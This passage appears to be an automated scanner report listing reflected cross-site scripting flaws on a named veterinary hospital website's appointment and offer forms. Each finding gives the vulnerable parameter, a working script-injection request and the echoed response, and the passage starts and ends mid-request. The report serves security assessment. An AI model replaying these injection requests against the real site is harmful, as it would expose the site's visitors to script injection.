253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=cr4nhjr58mse15chetc65pdm60; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AMbae55"><script>alert(1)</script>803b193c3aa&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2
...[SNIP]...

2.5. http://www.vcahospitals.com/hanson/appt.html [ampm2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The value of the ampm2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddea7"><script>alert(1)</script>769a3fc6d44 was submitted in the ampm2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AMddea7"><script>alert(1)</script>769a3fc6d44&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mig2fnj5prvum7phmej9acrtd7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AM&ampm2=AMddea7"><script>alert(1)</script>769a3fc6d44&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.v
...[SNIP]...

2.6. http://www.vcahospitals.com/hanson/appt.html [ampm3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The value of the ampm3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a25b"><script>alert(1)</script>18b15d79637 was submitted in the ampm3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM2a25b"><script>alert(1)</script>18b15d79637&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=795pv82b0poc4jb53dq6ne47c3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM2a25b"><script>alert(1)</script>18b15d79637&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospita
...[SNIP]...

2.7. http://www.vcahospitals.com/hanson/appt.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 994c2"><script>alert(1)</script>860b1adcd7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?994c2"><script>alert(1)</script>860b1adcd7c=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?994c2"><script>alert(1)</script>860b1adcd7c=1" />
...[SNIP]...

2.8. http://www.vcahospitals.com/hanson/offer.html [addr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998d7"><script>alert(1)</script>24a59a02e19 was submitted in the addr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=998d7"><script>alert(1)</script>24a59a02e19&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o6021kabr6ia1bncmhj0ivp1j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="addr" id="addr" type="text" size="50" class="req" maxlength="255" value="998d7"><script>alert(1)</script>24a59a02e19" />
...[SNIP]...

2.9. http://www.vcahospitals.com/hanson/offer.html [captcha_code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the captcha_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913cb"><script>alert(1)</script>e854b346b04 was submitted in the captcha_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=913cb"><script>alert(1)</script>e854b346b04&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:03 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8oag095b9alesr04oe0qrcema0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=913cb"><script>alert(1)</script>e854b346b04&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcah
...[SNIP]...

2.10. http://www.vcahospitals.com/hanson/offer.html [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bbf"><script>alert(1)</script>a5aae805f3c was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=75bbf"><script>alert(1)</script>a5aae805f3c&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3